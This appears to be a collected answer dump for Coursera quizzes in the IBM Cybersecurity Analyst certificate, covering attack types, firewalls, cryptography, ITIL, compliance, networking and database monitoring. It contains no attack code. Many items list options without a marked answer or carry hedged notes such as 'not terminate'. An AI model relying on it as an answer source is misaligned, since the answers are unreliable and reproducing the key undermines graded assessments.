IBM Cybersecurity Analyst Professional Certificate
Coursera Courses | Note: These courses have a lot of spelling errors.
Introduction to Cybersecurity Tools & Cyber Attacks
Which of the following statements is True?
Passive attacks are easy to detect because of the latency created by the interception and second forwarding.
Passive attacks are hard to detect because the original message is never delivered so the receiver does not know they missed anything.
Passive attacks are hard to detect because the original message is delivered unchanged and can pass an integrity check.
Passive attacks are easy to detect because the original message wrapper must be modified by the attacker before it is forwarded on to the intended recipient.
The purpose of security services includes which three (3) of the following?
Are intended to counter security attacks.
Enhance security of data processing systems and information transfer.
Often replicate functions found in physical documents
Includes any component of your security infrastructure that has been outsourced to a third-party
Which statement best describes access control?
Protection against denial by one of the parties in communication
Protection against the unauthorized disclosure of data
Assurance that the communicating entity is the one claimed
Prevention of unauthorized use of a resource
The International Telecommunication Union (ITU) X.800 standard addresses which three (3) of the following topics?
Transmission cost sharing between member countries
Data transmission speeds
Authentication
Access Control
Data Confidentiality
Protocol suppression, ID and authentication are examples of which?
Security Architecture
Security Mechanism
Business Policy
Security Policy
The motivation for more security in open systems is driven by which three (3) of the following factors?
New requirements from the WTO, World Trade Organization
The appearence[sic] of data protection legislation in several countries.
The desire by a number of organizations to use OSI recommendations.
Society's increasing dependance[sic] on computers.
True or False: The accidental disclosure of confidential data by an employee is considered a legitimate organizational threat.
True
True or False: The accidental disclosure of confidential information by an employee is considered an attack.
True
A replay attack and a denial of service attack are examples of which?
Security architecture attack
Passive attack
Masquerade attack
Origin attack
True or False: An application that runs on your computer without your authorization but does no damage to the system is not considered malware.
False
How would you classify a piece of malicious code designed to cause damage, can self-replicate and spreads from one computer to another by attaching itself to files?
Worm
How would you classify a piece of malicious code designed to cause damage and spreads from one computer to another by attaching itself to files but requires human actions in order to replicate?
Virus
How would you classify a piece of malicious code designed collect data about a computer and its users and then report that back to a malicious actor?
Spyware
A large scale Denial of Service attack usually relies upon which of the following?
A botnet
Antivirus software can be classified as which form of threat control?
Technical controls
Which of the following measures can be used to counter a mapping attack?
Record traffic entering the network
Look for suspicious activity like IP addresses or ports being scanned sequentially.
Use a host scanner and keep an inventory of hosts on your network.
All of the above.
In order for a network card (NIC) to engage in packet sniffing, it must be running in which mode?
Promiscuous mode
Which countermeasure can be helpful in combating an IP Spoofing attack?
Ingress filtering
Enable IP Packet Authentication filtering
Keep your certificates up-to-date
Enable the IP Spoofing feature available in most commercial antivirus software.
All of the above.
Which two (2) measures can be used to counter a Denial of Service (DOS) attack?
Enable the DOS Filtering option now available on most routers and switches.
Implement a filter to remove flooded packets before they reach the host.
Use traceback to identify the source of the flooded packets.
Enable packet filtering on your firewall.
Which countermeasure should be used against a host insertion attack?
Maintain an accurate inventory of computer hosts by MAC address.
Use a host scanning tool to match a list of discovered hosts against known hosts.
Investigate newly discovered hosts.
All of the above.
Which is not one of the phases of the intrusion kill chain?
Installation
Activation
Command and Control
Delivery
Which social engineering attack involves a person instead of a system such as an email server?
Vishing
Spectra
Phishing
Cyberwarfare
Which of the following is an example of a social engineering attack?
Logging in to the Army's missle[sic] command computer and launching a nuclear weapon.
Calling an employee and telling him you are from IT support and must observe him logging into his corporate account.
Setting up a web site offering free games, but infecting the downloads with malware.
Sending someone an email with a Trojan Horse attachment.
True or False: While many countries are preparing their military for a future cyberwar, there have been no "cyber battles" to-date.
False
Which tool did Javier say was crucial to his work as a SOC analyst?
SIEM (Security Information and Event Management): Tools like QRadar SIEM are crucial to Javier since he can use it to perform advanced correlations and threat intelligence integration.
Which hacker organization hacked into the Democratic National Convension[sic] and released Hillery[sic] Clinton's emails?
Fancy Bears[sic]
What challenges are expected in the future?
Enhanced espionage from more countries
Far more advanced malware
New consumer technology to exploit
Why are cyber attacks using SWIFT so dangerous?
Cyber attacks using SWIFT are so dangerous because SWIFT is the protocol used by all banks to transfer money, which puts confidential customer data at risk.
Explanation:
SWIFT is used by banking institutions: the entire banking operation is connected to a messaging network that was originally aimed at making communications between banks easier.
Although governments have taken various measures to prevent them, cyber attacks that steal customer data and fetch money from customers' accounts are common occurrences.
Hence, SWIFT, which relies on the internet and networking, might backfire and be a major threat to the people.
Which statement best describes Authentication?
Assurance that a resource can be accessed and used
Assurance that the communicating entity is the one claimed
Protection against denial by one of the parties in communication
Prevention of unauthorized use of a resource
Trusted functionality, security labels, event detection, security audit trails and security recovery are all examples of which type of security mechanism?
Contingent security mechanism
Active security mechanism
External security mechanism
Passive security mechanism
If an organization responds to an intentional threat, that threat is now classified as what?
An attack
-An active threat
A malicious threat
An open case
An attack that is developed particularly for a specific customer and occurs over a long period of time is a form of what type of attack?
-Water Hole
Advanced Persistent Threat
Spectra
Denial of Service (DOS)
Which three (3) of these approaches could be used by hackers as part of a Business Email Compromise attack?
Account compromise
Attorney impersonation
Request to make a payment
CEO Fraud, where CEO sends email to an employee
Which type of actor was not one of the four types of actors mentioned in the video A brief overview of types of actors and their motives?
Black Hats
A political motivation is often attributed to which type of actor?
Hacktivist
Which type of actor hacked the 2016 US Presidential Elections?
Government
True or False: Passive attacks are easy to detect because the original messages are usually altered or undelivered.
Cryptography, digital signatures, access controls and routing controls considered which?
-Pervasive security mechanisms
security policy
Which type of attack can be addressed using a switched Ethernet gateway and software on every host on your network that makes sure their NICs are not running in promiscuous mode?
Packet Sniffing
True or False: An individual hacks into a military computer and uses it to launch an attack on a target he personally dislikes. This is considered an act of cyberwarfare.
True or False: A tornado threatening a data center can be classified as an attack.
Traffic flow analysis is classified as which?
Passive attack
Botnets can be used to orchestrate which form of attack?
Distribution of Spam
-DDoS attacks
Phishing attacks
Distribution of Spyware
As a Malware launchpad
All of the above
Policies and training can be classified as which form of threat control?
-Administrative controls
Passive Controls
Encrypting your email is an example of addressing which aspect of the CIA Triad?
Confidentiality
Integrity
Availability
Trudy changes the meeting time in a message she intercepts from Alice before she forwards it on to Bob. This is a violation of which aspect of the CIA Triad?
Confidentiality
Integrity
Availability
You fail to backup your files and then drop your laptop breaking it into many small pieces. You have just failed to address which aspect of the CIA Triad?
Confidentiality
Integrity
Availability
The use of digital signatures is an example of which concept?
Non-repudiation
Confidentiality
Integrity
Availability
Managers in the Singapore office at your company can access documents that managers in other offices cannot access, nor can nonmanager employees in the Singapore office. Which 2 access criteria types were likely involved in setting this up?
Groups: Managers would be in a managers group.
Timeframe
Transaction type
Physical location: Location is used as an access control factor.
In incident management, an event that has a negative impact on some aspect of the network or data is called what?
Event
Attack
Incident: an event with impact
Threat
In incident management, a data inventory, data classification and data management process are part of which key concept?
Automated system
Business Continuity Plan & Disaster Recovery
E-Discovery: It is crucial to have an automated inventory of systems and data so you can know if anything changes or does not belong.
Post-Incident Activities
Which phase of the Incident Response Process do steps like Identify cyber security incident, Define objectives and investigate situation and Take appropriate action fall into?
Phase 1: Prepare
Phase 2: Respond
Phase 3: Follow Up
In the context of security standards and compliance, which two (2) of these items are goals of frameworks and best practices?
They seek to improve performance, controls and metrics.
They are rules to follow for a specific industry.
They serve as an enforcement mechanism for government, industry or clients.
They help translate the business needs into technical or operational needs.
A company document that says employees may not do online shopping while at work would be which of the following?
Strategic Plan
Tactical Plan
Procedure
Policy
Which three (3) of these are compliance standards that must be adhered to by companies in some industries / countries?
HIPAA
PCI/DSS
OCTAVE
SOX
A method of evaluating computer and network security by simulating an attack on a computer system or network from external or internal threats is known as which of the following?
A threat
A white hat
A hack
A pentest
The OWASP “Top 10” provides guidance on what?
The top 10 malware exploits reported each year.
The top 10 network vulnerabilities reported each year.
The top 10 cybercrimes reported each year.
The top 10 application vulnerabilities reported each year.
Which two (2) key components are part of incident response? (Select 2)
Response team
Threat
Investigation
Attack
Which is not part of the SANS Institute's audit process?
Deliver a report.
Define the audit scope and limitations.
Help to translate the business needs into technical or operational needs.
Feedback based on the findings.
Which key concept to understand incident response is defined as "data inventory, helps to understand the current tech status, data classification, data management, we could use automated systems. Understand how you control data retention and backup."
E-Discovery
Which is not included as part of the IT Governance process?
Tactical Plans
Procedures
Audits
Policies
A hash is a mathematical algorithm that helps assure which aspect of the CIA Triad?
Integrity
A successful DOS attack against your company’s servers is a violation of which aspect of the CIA Triad?
Availability
Which of these is an example of the concept of non-repudiation?
Alice sends a message to Bob with certainty that it was not altered while en route by Trudy.
Alice sends a message to Bob with certainty that it will be delivered.
Alice sends a message to Bob and Bob knows for a certainty that it came from Alice and no one else.
Alice sends a message to Bob and Alice is certain that it was not read by Trudy.
You have been asked to establish access to corporate documents in such a way that they can be read from anywhere, but only modified while the employees are in the office. Which 2 access criteria types were likely involved in setting this up?
Groups
Physical location
Transaction type
Timeframe
In incident management, an observed change to the normal behavior of a system, environment or process is called what?
Event
In incident management, tools like SIEM, SOA and UBA are part of which key concept?
Automated system
BCP & Disaster Recovery
Post-Incident Activities
E-Discovery
Which phase of the Incident Response Process do steps like Carry out a post incident review and Communicate and build on lessons learned fall into?
Respond
Follow Up
Prepare
In the context of security standards and compliance, which two (2) of these are considered normative and compliance items?
They seek to improve performance, controls and metrics.
They are rules to follow for a specific industry.
They help translate the business needs into technical or operational needs.
They serve as an enforcement mechanism for government, industry or clients.
A company document that details how an employee should request Internet access for her computer would be which of the following?
Procedure
Strategic Plan
Policy
Tactical Plan
Which of these is a methodology by which to conduct audits?
SOX
HIPAA
PCI/DSS
OCTAVE
Mile 2 CPTE Training teaches you how to do what?
Conduct a pentest.
Advanced network management tasks
Conduct a Ransomware attack
Construct a botnet
Which three (3) statements about OWASP are True?
OWASP stands for Open Web Application Security Project
OWASP provides tools and guidance for mobile applications.
OWASP Top 10 only lists the top 10 web application vulnerabilities but you must engage an OWASP certified partner to learn how to fix them.
OWASP provides guidance and tools to help you address web application vulnerabilities on their Top 10 list.
Firewalls contribute to the security of your network in which three (3) ways?
Prevent unauthorized modifications to internal data from an outside actor.
Allow only authorized access to inside the network.
Prevent an internal user from downloading data she is not authorized to access.
Prevent Denial of Service (DOS) attacks.
Which packets are selected for inspection by a packet filtering firewall?
Every packet entering or leaving a network.
The first packet of every transmission but only subsequent packets when “high risk” protocols are used.
Every packet entering the network but no packets leaving the network.
The first packet in any transmission, whether entering or leaving.
True or False: Application Gateways are an effective way to control which individuals can establish telnet connections through the gateway.
Why are XML gateways used?
XML packet headers are different from that of other protocols and often “confuse” conventional firewalls.
Conventional firewalls attempt to execute XML code as instructions to the firewall.
XML traffic cannot pass through a conventional firewall.
XML traffic passes through conventional firewalls without inspection.
Which three (3) things are True about Stateless firewalls?
They filter packets based upon Layer 3 and 4 information only (IP address and Port number)
They are faster than Stateful firewalls.
They maintain tables that allow them to compare current packets with previous packets.
They are also known as packet-filtering firewalls.
True or False: Most Antivirus/Antimalware software works by comparing each file encountered on your system against a compressed (zipped) version of known malware maintained by the vendor on the local host.
How many unique encryption keys are required for 2 people to exchange a series of messages using asymmetric public key cryptography?
4
What is Cryptographic Strength?
Relies on math, not secrecy
Ciphers that have stood the test of time are public algorithms.
Exclusive Or (XOR) is the “secret sauce” behind modern encryption.
All of the above.
What is the primary difference between Symmetric and Asymmetric encryption?
The same key is used to both encrypt and decrypt the message.
Which type of cryptographic attack is characterized by an attack based upon trial and error where many millions of keys may be attempted in order to break the encrypted message?
brute-force
What is the correct sequence of steps required for Alice to send a message to Bob using asymmetric encryption?
Alice requests Bob’s public key and uses it to encrypt her message. Alice then sends the encrypted message to Bob who decrypts it using his private key.
A skilled penetration tester wants to show her employer how smart she is in hopes of getting a promotion. Without obtaining permission, she hacks into the company’s new online store to see if there are any weaknesses that can be hardened before the system goes live. She does not do any damage and writes a useful report which she sends over her boss’s head to the CISO. What color hat was she wearing?
A White Hat
A Gray Hat
A Black Hat
A Pink Hat
A Rainbow Hat
Which three (3) are resources that are available to help guide penetration testing efforts by cybersecurity specialists?
General Data Protection Regulation (GDPR)
Open Source Security Testing Methodology Manual (OSSTMM).
NIST SP 800-42 Guidelines on Network Security Testing.
Information Systems Security Assessment Framework (ISSAF)
According to the Vulnerability Assessment Methodology, Potential Impacts are determined by which 2 factors?
Identify Indicators and Exposure
Exposure and Sensitivity
Potential Impacts and Adaptive Capacity
Sensitivity and Adaptive Capacity
In digital forensics, the term Chain of Custody refers to what?
This is a digital “chain” that isolated digital evidence from being disturbed until it can be analyzed by the police or other authorities.
This is a physical chain that is place around a crime scene to protect the evidence from being disturbed.
The record that documents the sequence of custody, control, transfer, analysis, and disposition of physical or electronic evidence.
This chain of custody is simply a written record of who possessed the evidence as it moves from collection to analysis to presentation in a court of law.
What is the primary function of a firewall?
Scans the system and search for matches against the malware definitions.
Secures communication that may be understood by the intended recipient only.
Filter traffic between networks.
Uses malware definitions.
What is Locard's exchange principle?
The perpetrator of a crime will bring something into the crime scene and leave with something from it, and that both can be used as forensic evidence.
Which two (2) are types of firewall?
Protocol-filtering
Packet-filtering
Statutory
Application-level
Which type of data does a packet-filtering firewall inspect when it decides whether to forward or drop a packet?
Source and destination IP addresses.
TCP/UDP source and destination port numbers.
ICMP message type.
TCP SYN and ACK bits.
All of the above.
Which three (3) of the following are limitations of Application gateways?
Application gateways are susceptible to IP spoofing.
Each application to be managed needs its own gateway.
Client software must be “smart” and know to contact the gateway.
Application gateways are not good at understanding protocols such as telnet.
Which type of firewall inspects XML packet payloads for things like executable code, a target IP address that makes sense, and a known source IP address?
An XML Gateway.
An application-level firewall.
A packet-filtering firewall.
All of the above.
Which statement about Stateful firewalls is True?
They have state tables that allow them to compare current packets with previous packets.
They are less secure in general than Stateless firewalls.
They are faster than Stateless firewalls.
All of the above.
True or False: Most Antivirus/Antimalware software works by comparing a hash of every file encountered on your system against a table of hashes of known virus and malware previously made by the antivirus/antimalware vendor.
Which type of cryptographic attack is characterized by comparing a captured hashed password against a table of many millions of previously hashed words or strings?
Social Engineering
Brute force
Rainbow Tables
Known Plaintext
Known Ciphertext
What are two (2) drawbacks to using symmetric key encryption?
A modern supercomputer can break even the most advanced symmetric key in a matter of minutes.
The sender and recipient must find a secure way to share the key itself.
Symmetric key encryption is slower than asymmetric key encryption.
You need to use a different encryption key with everyone you communicate with, otherwise anyone who has ever received an encrypted message from you could open any message you sent to anyone else using that key.
Cybersecurity Roles, Processes & Operating System Security
The statement “The protection of computer systems from theft or damage to the hardware, software or information on them, as well as from disruption or misdirection of the services they provide.” is a good definition for what?
IT Security
When looking at security standard and compliance, which three (3) are characteristics of best practices, baselines and frameworks?
They are rules to follow for a specific industry.
They seek to improve performance, controls and metrics.
They enforce government, industry or client regulations.
They are used to improve controls, methodologies and governance for the IT department.
They help translate the business needs into technical or operational needs.
Which three (3) of these roles would likely exist in an Information Security organization?
Regional Sales Executive
Product Development Manager
CISO, Chief Information Security Officer
Vulnerability Assessor
Director of Human Resources
Information Security Architect
In the video Introduction to Process, which three (3) items were called out as critical to the success of a Security Operations Center (SOC)?
People
Process
Tools
Uninterruptible Power Supplies for all critical systems.
Bandwidth
Faraday Cages
Process performance metrics typically measure items in which four (4) categories?
Rework
Parts Inventory on hand
Backlog of pending orders
Quality (defect rate)
Injuries
Cost
Cycle time
Service Portfolio Management, Financial Management, Demand Management and Business Relationship Management belong to which ITIL Service Lifecycle Phase?
Service Design
Service Improvement
Service Operations
Service Strategy
Service Transition
Log, Assign, Track, Categorize, Prioritize, Resolve and Close are all steps in which ITIL process?
Change Management
Problem Management
Incident Management
Event Management
What critical item is noted when discussing process roles?
Separation of duties is critical; the approver should not be the requester.
Service Operations: Event Management, Incident Management, Problem Management
Service Design: Service Catalogue Management, Service Level Management, InfoSec Management, Supplier Management
The process in ITIL where changes are released to an IT environment is called what?
Release Management
Which two (2) processes are operational processes? (Select 2)
Change Management
Incident Management
Availability Management
Financial Management
Which two (2) of these are considered best practices? (Select 2)
ITIL
Project Manager methodologies
HIPAA
SOX
Which service management process has the responsibility of understanding the root cause of a problem?
Problem Management
Change Management
Incident Management
Configuration Management
In the video What is IT Security, Elio Sanabria Echeverria put forth a definition that included which factors?
The protection of computer hardware.
The protection of computer software.
The protection of data.
The disruption or misdirection of services provided by your systems.
All of the above.
This description belongs to which information security role? “This position is in charge of testing the effectiveness of computer information systems, including the security of the systems and reports their findings.”
Information Security Auditor
Which of these statements more accurately conveys what was stated in the video Introduction to Process?
As volumes of security alerts and false positives grow, more burden is placed upon Security Analysts & Incident Response teams.
Solid and well documented security processes are making the role of the security analyst increasingly obsolete.
As security monitoring and analysis tools advance and incorporate artificial intelligence, Information Security organizations are challenged to find new work for underutilized security analysts.
Continual Process Improvement consists of which four (4) items? (Select 4)
Financial performance
Maturity Assessments
Customer Feedback
Process Metrics
Focus Group studies
Market Research
Legal Review
Event Management, Incident Management, and Problem Management belong to which ITIL Service Lifecycle Phase?
Service Transition
Service Improvement
Service Design
Service Strategy
Service Operations
Maintaining Information Security Policy (ISP) and specific security policies that address each aspect of strategy, objectives and regulations is the part of which ITIL process?
Problem Management
Change Management
Service Level Management
Information Security Management
Which aspect of the CIA Triad would cover preserving authorized restrictions on information access and disclosure?
Confidentiality
A message that Bob receives from Alice is genuine and can be verified as such demonstrates which key property?
Authenticity
Which is the correct order for gaining access to a resource?
Authentication Identification, Authorization, Accountability
Identification, Authentication, Authorization, Accountability
Identification, Authorization, Authentication, Accountability
Accountability, Identification, Authentication, Authorization
Which type of method would include something you know, such as a password?
Accountability
Authentication: something you know, something you have, something you are
Identification
Authorization
Which three (3) are common methods of access control?
Role Based Access Control (RBAC): assigns access based upon the roles assigned to an individual
Perimeter Access Control (PAC)
Mandatory Access Control (MAC): common form that uses labels to restrict access
CIA Triad Access Control (CTAC)
Discretionary Access Control (DAC): requires the creator of any object to assign access controls to that object
Which three (3) items would be considered Physical Access Control methods?
Perimetral
Access Control Lists (ACL) - logical control
Work areas
Password policies - logical control
Building
Which is an example of technical uses of physcial[sic] security controls?
Tokens
Tramps
Lists and logs
All of the above.
Hamid has access to certain resources because he is a Quality Control Inspector and he has access to other resources because he is the manager of that team. Which form of access control is his company most likely using?
RBAC
Which type of method would include something you are, such as a fingerprint?
Authentication
How many unique address spaces are used by applications running in kernel mode?
1: All applications run in the same shared address space in Kernel mode
Which two (2) of these file systems could you use to format a 64 GB USB drive?
FAT32 && NTFS
Where does Windows 10 store 64-bit applications?
\Program Files
Where does Windows 10 store 32-bit applications?
\Program Files (x86)
Which three (3) groups can "own" a file in Linux?
user, group, everybody
What application can you use to see all the active running applications and processes on macOS?
Activity Monitor
What feature in macOS prevents unauthorized applications from being installed?
Gatekeeper
Which three (3) utilities are found when booting macOS to the recovery partition? (Select 3)
Safari
Disk Utility
Time Machine
Cybersecurity Compliance Framework & System Administration
A security attack is defined as which of the following?
An event that has been reviewed by analysts and deemed worthy of deeper investigation.
All cybersecurity events.
An event on a system or network detected by a device.
An event that has been identified by correlation and analytics tools as a malicious activity.
Which order does a typical compliance process follow?
Establish scope, readiness assessment, gap remediation, testing/auditing, management reporting
Under GDPR who determines the purpose and means of processing of personal data?
Controller
Under the International Organization for Standardization (ISO) which standard focuses on Privacy?
ISO 27018
What is an auditor looking for when they test the control for implementation over an entire offering with no gaps?
Completeness
The HIPAA Security Rule requires covered entities to maintain which three (3) reasonable safeguards for protecting e-PHI?
administrative
physical
technical
HIPAA Administrative safeguards include which two (2) of the following?
Workforce training and management
Security Personnel
Who is the governing entity for HIPAA?
US Department of Health and Human Services Office of Civil Rights
HIPAA Physical safeguards include which two (2) of the following?
Facility Access and Control
Workstation and Device Security
PCI uses which three (3) of the following Card Holder Data Environment categories to determine scope?
Processes
Technology
People
One PCI Requirement is using an approved scanning vendor to scan at what frequency?
Quarterly
In which CIS control category will you find Incident Response and Management?
Organizational
Which is NOT an example of a client?
e-mail Server
Which three (3) threat key factors should be considered when looking at an Endpoint Security Solution?
detection response, user education, threat hunting
Which two types of updates do most organizations patch as soon as possible after testing?
Security and Critical
A patch is a set of changes to a computer program or its data designed for which three (3) functions?
improve, fix, update
Which three (3) are common Endpoint attack types?
Spear Phishing
Whale hunting
Ad Network
Which three (3) of the following steps can be taken to help protect sensitive Windows domain accounts? (Select 3)
Disable the account delegation rights for administrator accounts.
Grant user logon access to servers and workstations.
Create dedicated workstation hosts without Internet and email access.
Separate administrator accounts from user accounts.
Network Security & Database Vulnerabilities
Which network layer do IP addresses belong to?
The Network Layer
Which address assures a packet is delivered to a computer on a different network segment from the sender?
The IP Address
A network device that is capable of sending and receiving data at the same time is referred to as which of the following?
Full duplex
True or False: Collision avoidance protocols are critical to the smooth operation of modern networks.
Comparing bridges with switches, which are three (3) characteristics specific to a bridge?
End-user devices share bandwidth on each port.
Virtual LANs are not possible.
Half-duplex transmission.
ARP tables only keep track of addresses within the node's broadcast domain
If a network server has four (4) network interface cards, how many MAC addresses will be associated with that server?
4
True or False: When you connect your laptop to a new network, a new IP address will be assigned.
What does the Address Resolution Protocol (ARP) do when it needs to send a message to a location that is outside its broadcast domain?
ARP sends the message to the MAC address of the default gateway.
Routing tables are maintained by which of the following devices?
On any network connected device.
What is the purpose of a default gateway?
It forwards messages coming from, or going to, external networks.
If a message is being sent to a computer that is identified in the computer's routing table, what type of connection would be established?
Direct
What is meant by "stateless" packet inspection?
It is a packet-by-packet inspection with no awareness of previous packets.
True or False: An Intrusion Detection System (IDS) is generally a passive device that listens to network traffic and alerts an administrator when a potential problem is detected?
True or False: The primary difference between an Intrusion Detection System (IDS) and an Intrusion Prevention System (IPS) is that an IDS is designed as a passive system that listens and alerts while an IPS is an active system that is designed to take action when a problem is detected?
Which intrusion system does not add any delay to network traffic?
IDS
How does using Network Address Translation (NAT) provide an additional layer of security to your network?
By hiding the real IP addresses of all the devices on your private network and exposing only a single public IP address.
Which type of NAT routing maps unregistered IP addresses to a single registered IP address allowing thousands of users to be connected to the Internet using only a single global IP address?
Overload
Which network layer do MAC addresses belong to?
Data Link
Which address assures a packet is delivered to a computer on the same network segment as the sender?
The MAC address.
A network device that cannot send and receive data at the same time is referred to as which of the following?
Half duplex
When a NIC reads a packet header and sees the destination address is not its own address, what does it do with the packet?
It discards the packet.
Comparing bridges with switches, which are three (3) characteristics specific to a switch?
Virtual LANs are possible.
Each port is dedicated to a single device; bandwidth is not shared.
Full-duplex transmission.
True or False: Switches can connect two geographically dispersed networks.
A network interface card's MAC address is also known by which two (2) of the following?
The physical address.
The burn address.
What is the main function of the Address Resolution Protocol (ARP)?
To translate a MAC address to an IP address and vice versa.
What does a router do when it needs to send a packet to an address that is not in its routing table?
It forwards the packet to the default gateway.
What happens to messages sent from a computer that has no gateway address specified?
Messages sent to other computers on the same subnet will be delivered but those destined to computers on other networks will not be delivered.
Which three (3) are types of routes found in a routing table?
Direct
Dynamic
Default
The IP address range goes from 0.0.0.0 to 255.255.255.255 and is known as the "four octets". Why are these 4 numbers called octets?
The number 255 in decimal takes up 8 digits in binary.
How many octets are used to define the network portion of the IP address in a Class C network?
3
True or False: A routable protocol is a protocol whose packets may leave your network, pass through your router, and be delivered to a remote network.
True or False: The destination address is defined in the packet header but the source address is in the packet footer.
Which network mask belongs to a Class A network?
255.0.0.0
What is the primary function of DNS?
To translate domain names to IP addresses and vice versa.
How does a new endpoint know the address of the DHCP server?
The endpoint sends a DHCP Discover broadcast request to all endpoints on the local network.
Which Syslog layer contains the actual message contents?
Syslog Content
True or False: Setting the correct Syslog Severity Level on systems helps keep the Syslog server from being flooded by the millions of messages that could be generated by these systems.
True or False: The Syslog message typically includes the severity level, facility code, originator process ID, a time stamp, and the hostname or IP address of the originator device.
Why is port mirroring used?
To provide a stream of all data entering or leaving a specific port for debugging or analysis work.
What is the main difference between a Next Generation Firewall (NGFW) and a traditional firewall?
NGFW use sessions.
True or False: Unlike traditional stateful firewalls, next-generation firewalls drill into traffic to identify the applications traversing the network.
What are the two (2) primary methods used by Intrusion Prevention Systems (IPS) to discover an exploit?
Statistical anomaly-based detection.
Signature-based detection.
If your nontechnical manager told you that you must configure your traditional second-generation firewalls to block all users on your network from posting messages on Facebook from their office computers, how would you carry out this request?
You would have to block any IP addresses used by Facebook.
How does an endpoint know the address of the DNS server?
It is manually configured in the network settings by the administrator or obtained from the DHCP server.
What is the primary function of DHCP?
To automatically assign IP addresses to systems.
Which Syslog layer would handle the routing and storage of a Syslog message?
Syslog Application
Which of the following flow data are gathered by utilities such as NetFlow?
Packet count and byte count.
Source and destination TCP/UDP ports.
Source and destination IP addresses.
Routing and peering data such as TCP flags and protocol.
All of the above.
When a network interface card is operating in promiscuous mode, what action does it take?
The NIC sends all packets to the CPU for processing instead of only those packets indicated for its MAC address.
If a packet is allowed to pass through a NGFW based upon the established firewall rules and a new session is established, how does the NGFW treat the next packet it encounters from the same session?
Subsequent packets of the same session are automatically allowed.
If your nontechnical manager told you that you must configure your next generation firewalls (NGFW) to block all users on your network from posting messages on Facebook from their office computers, what would be the consequence of carrying out his order?
No serious consequence, application-level inspection and blocking can be configured.
Monitoring network traffic and comparing it against an established baseline for normal use is an example of which form of intrusion detection?
Statistical anomaly-based detection
Which are three (3) characteristics of a highly available system?
Redundancy
Failover
Monitoring
True or False: If all of your organization's data is centralized in a small number of data centers, then focusing security on perimeter defense is adequate to assure your data is safe.
Which two (2) of the following data source types are considered structured data?
Data warehouses
Distributed databases
Data that has not been organized into a specialized repository, but does have associated information, such as metadata that makes it more amenable to processing than raw data, is an example of which data model type?
Semi-structured data
How are the tables in a relational database linked together?
Through the use of primary and foreign keys.
In the video Securing the Crown Jewels, the "Identification and Baseline" phase contains which three (3) of the following items?
Vulnerability Assessment
Blocking & Quarantine
Activity Monitoring
Discovery & Classification
Entitlements Reporting
In the video Securing the Crown Jewels, the "Real-Time Monitor & Protection" phase contains which three (3) of the following items?
Activity Monitoring
Blocking & Quarantine
Dynamic Data Masking
In the video Securing the Crown Jewels, the "Raise Bar" phase contains:
Reconfigure, Mask & Encrypt
In the video Leveraging Security Industry Best Practices, which US Government agency is a co-publisher of the Database Security Requirements Guide (SRG)?
Department of Defense (DoD)
For added security, a firewall is often placed between which of these?
The database and the hardened data repository.
True or False: In a vulnerability assessment test, a new commercial database installed on a new instance of a major operating system should pass 80-90% of the vulnerability tests out-of-the-box unless there is a major flaw or breach.
Which of these hosting environments requires the enterprise to manage the largest number of different data sources?
on prem
While data security is an ongoing process, what is the correct order to consider these steps?
Discover, Harden, Monitor & Protect, Repeat
In setting up policy rules for data monitoring, what is the purpose of "exclude" rules?
To exclude certain applications or safe activities from being logged.
True or False: Data monitoring products such as IBM Guardium can send access alerts to syslog for manual intervention by a security analyst but must be connected to additional applications if automated interventions are desired.
To create auditable reports of data access using the IBM Guardium product, the administrator would do which of the following?
Use the Audit Process Builder feature to automate the reporting process.
True or False: The IBM Guardium monitoring application is capable of monitoring activities in non-relational databases such as Hadoop, Cognos, and Spark.
At a minimum, which 3 entities should be captured in any event log?
When the activity took place.
What activity took place.
Who or what committed the activity.
True or False: In the IBM Guardium data monitoring tool, the number of failed login attempts that would trigger an alert are always counted since the last successful login.
Which activity should be considered suspicious and might indicate inappropriate activity is being attempted?
Attempts are made to access data using nonstandard tools, such as MS Excel or MS Access, rather than through the application the data belongs to.
Which two (2) activities should be considered suspicious and warrant further investigation?
Use of an Application ID from an IP that is different from what has been specified by the application owner.
Use of an Application ID from a hostname that is different from what has been specified by the application owner.
Distributed databases, data warehouses, big data, and File shares are all classified as what?
Data source types
Hadoop, MongoDB, and BigTable are all examples of which data source type?
Big data databases
Data that has been organized into a formatted repository, typically a database, so its elements can be made addressable, is an example of which data model type?
Structured data
Which of the following is the primary difference between a flat file database and a relational database?
All the data in a flat file database is stored in a single table.
In the video Leveraging Security Industry Best Practices, where would you turn to look for help on establishing security benchmarks for your database?
not Department of Defense/Defence Information Systems Agency (DoD/DISA).
Center for Internet Security (CIS).
Most of the time, how do users access data?
Through an application.
True or False: In a vulnerability assessment test, it is not uncommon to fail more than 50% of the tests before the operating system and database are hardened.
Which of these hosting environments requires the service provider to manage the largest number of different data sources?
SaaS
While data security is an ongoing process, what is the correct order to consider these steps?
Identification & Baseline, Raise the Bar, Real-time Monitor & Protection
To automatically terminate a session if an attempt is made to access data in a sensitive table, such as Social Security (SSN) ID numbers, you would set up which type of rule?
not terminate
An Access rule.
True or False: Data monitoring products such as IBM Guardium are fully capable of blocking access to sensitive data based upon access parameters configured in policy rules.
In which two (2) ways can security events collected by a data monitoring tool be logged to a security incident and event management (SIEM) system?
Configure the monitoring system to write to the SIEM system's syslog file.
Configure bidirectional communication between the monitoring and SIEM systems, if available.
Export security events from your monitoring tool and import them into your SIEM tool.
Configure your SIEM system to read the monitoring system's local syslog file.
True or False: Data monitoring tools such as IBM Guardium are designed to monitor activities within a database, but external products, such as a privileged identity management (PIM) tool would be required to monitor changes to the data monitoring tool itself, such as the addition of new users or the alteration of existing user accounts.
True or False: In the IBM Guardium data monitoring tool, it is possible to create a report that shows not only how many SQL unauthorized access attempts were made by an individual, but also exactly which SQL statements were disallowed.
Which activity should be considered suspicious and might indicate inappropriate activity is being attempted?
Attempts are made to SELECT lists of usernames and passwords by a non-administrator account.
Which two (2) activities should be considered suspicious and warrant further investigation?
The data monitoring logging system was manually shut down.
There were attempts to purge event logs.
It takes an authorized user 3 attempts to enter the correct password.
An authorized user attempts to run SQL statements with invalid syntax.
Which operating system is susceptible to OS Command Injection attacks?
All
What is a possible impact of running commands through OS shell interpreters such as sh, bash, cmd.exe and powershell.exe?
It makes it easier for a hacker to inject additional commands or arguments.
True or False: Safe coding practice avoids using OS commands when it can be avoided.
True or False: Safe coding practice always runs commands through a shell interpreter.
True or False: Safe coding practice uses library functions when running OS commands.
True or False: Safe coding practice uses blacklists and avoids the use of whitelists.
A hacker tailoring his actions based on the database errors the application displays is an example of which type of SQL Injection attack?
True or False: Use of prepared statements is an effective mitigation against SQL Injection attacks because it separates the query structure from the query parameters.
True or False: Native database errors should be hidden from the user to prevent hackers from gaining insight into the internal structure of your application.
